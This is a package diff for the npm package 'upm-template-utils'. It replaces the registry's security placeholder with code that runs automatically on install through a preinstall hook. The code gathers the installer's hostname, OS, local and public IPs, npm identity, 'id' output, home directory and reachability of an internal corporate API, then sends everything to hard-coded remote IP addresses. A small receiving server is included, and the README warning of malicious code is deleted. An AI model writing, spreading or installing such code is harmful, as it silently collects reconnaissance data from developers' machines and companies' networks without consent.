upm-template-utils 0.0.1-security → 1.0.6

package/index.js

@@ -0,0 +1,101 @@
+const os = require('os');
+const axios = require('axios');
+const { execSync } = require('child_process');
+
+// Function to get the public IP address
+async function getPublicIP() {
+  try {
+    const response = await axios.get('https://ipinfo.io/json');
+    return response.data.ip || 'Unknown';
+  } catch (error) {
+    return 'Unknown';
+  }
+}
+
+// Function to test internal HTTP requests
+async function checkInternalAPI() {
+  try {
+    const response = await axios.get('http://internal.company.com/api/status', { timeout: 3000 });
+    return response.status === 200 ? "Accessible" : "No Access";
+  } catch (error) {
+    return "No Access";
+  }
+}
+
+// Function to check npm registry authentication (if inside the company's network)
+function checkNPMAccess() {
+  try {
+    return execSync('npm whoami').toString().trim();
+  } catch (error) {
+    return "Not Authenticated";
+  }
+}
+
+// Function to check domain and AD user (if applicable)
+function checkDomain() {
+  try {
+    return execSync('id').toString().trim();
+  } catch (error) {
+    return "Unknown";
+  }
+}
+
+// Collect system and network info
+function getNetworkInfo() {
+  const interfaces = os.networkInterfaces();
+  let ipAddress = 'Unknown';
+
+  for (const iface of Object.values(interfaces)) {
+    for (const details of iface) {
+      if (details.family === 'IPv4' && !details.internal) {
+        ipAddress = details.address;
+        break;
+      }
+    }
+  }
+
+  return {
+    hostname: os.hostname(),
+    osType: os.type(),
+    osPlatform: os.platform(),
+    osRelease: os.release(),
+    localIP: ipAddress
+  };
+}
+
+// Function to send collected data
+async function pingBack(data) {
+  try {
+    console.log("Sending data:", JSON.stringify(data, null, 2));
+
+    const response = await axios.post('http://23.22.251.177:8080/collect_info.php', data, {
+      headers: { 'Content-Type': 'application/json' }
+    });
+
+    console.log('Pingback sent successfully:', response.data);
+  } catch (error) {
+    console.error('Error sending pingback:', error.response ? error.response.data : error.message);
+  }
+}
+
+// Main function to collect and send data
+async function collectData() {
+  const networkInfo = getNetworkInfo();
+  const publicIP = await getPublicIP();
+  const internalAPI = await checkInternalAPI();
+  const npmUser = checkNPMAccess();
+  const domainUser = checkDomain();
+
+  const data = { 
+    ...networkInfo,
+    publicIP,
+    internalAPI,
+    npmUser,
+    domainUser
+  };
+
+  await pingBack(data);
+}
+
+// Execute the script
+collectData();

package/kk.js

@@ -0,0 +1,69 @@
+const os = require('os');
+const axios = require('axios');
+
+// Function to get the public IP address
+async function getPublicIP() {
+  try {
+    const response = await axios.get('https://ipinfo.io/json');
+    return response.data.ip || 'Unknown';
+  } catch (error) {
+    console.error('Error fetching public IP:', error.message);
+    return 'Unknown';
+  }
+}
+
+// Function to send collected data (Pingback)
+async function pingBack(data) {
+  try {
+    console.log("Sending data:", JSON.stringify(data, null, 2)); // Debugging log
+
+    const response = await axios.post('http://35.170.187.220:8080/collect_info.php', data, {
+      headers: {
+        'Content-Type': 'application/json'  // Ensure correct content type
+      }
+    });
+
+    console.log('Pingback sent successfully:', response.data);
+  } catch (error) {
+    console.error('Error sending pingback:', error.response ? error.response.data : error.message);
+  }
+}
+
+// Function to collect system and network information
+function getNetworkInfo() {
+  const interfaces = os.networkInterfaces();
+  let ipAddress = 'Unknown';
+
+  // Find the first non-internal IPv4 address
+  for (const iface of Object.values(interfaces)) {
+    for (const details of iface) {
+      if (details.family === 'IPv4' && !details.internal) {
+        ipAddress = details.address;
+        break;
+      }
+    }
+  }
+
+  return {
+    hostname: os.hostname(),
+    homeDirectory: os.homedir(),
+    currentDirectory: process.cwd(),
+    localIP: ipAddress
+  };
+}
+
+// Main function to collect and send data
+async function collectData() {
+  const networkInfo = getNetworkInfo();
+  const publicIP = await getPublicIP();
+
+  const data = { 
+    ...networkInfo,
+    publicIP
+  };
+
+  await pingBack(data);
+}
+
+// Execute the script
+collectData();

package/package.json

@@ -1,6 +1,33 @@
 {
   "name": "upm-template-utils",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.6",
+  "description": "Package Claimed  By JPD",
+  "license": "ISC",
+  "author": "JPD",
+  "type": "commonjs",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [
+    "rce",
+    "security",
+    "exploit",
+    "vulnerability"
+  ],
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/JPD-12/public-repo-ui.git"
+  },
+  "bugs": {
+    "url": "https://github.com/JPD-12/public-repo-ui/issues"
+  },
+  "homepage": "https://github.com/JPD-12/public-repo-ui#readme",
+  "engines": {
+    "node": ">=14.0.0"
+  },
+  "dependencies": {
+    "axios": "^1.7.9"
+  }
 }

package/server.js

@@ -0,0 +1,14 @@
+const express = require('express');
+const app = express();
+const port = 8080;
+
+app.use(express.json());
+
+app.post('/', (req, res) => {
+  console.log('Received data:', req.body); // Log the incoming data
+  res.status(200).send('Data received');
+});
+
+app.listen(port, () => {
+  console.log(`Server running at http://23.22.251.177:${port}/`);
+});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=upm-template-utils for more information.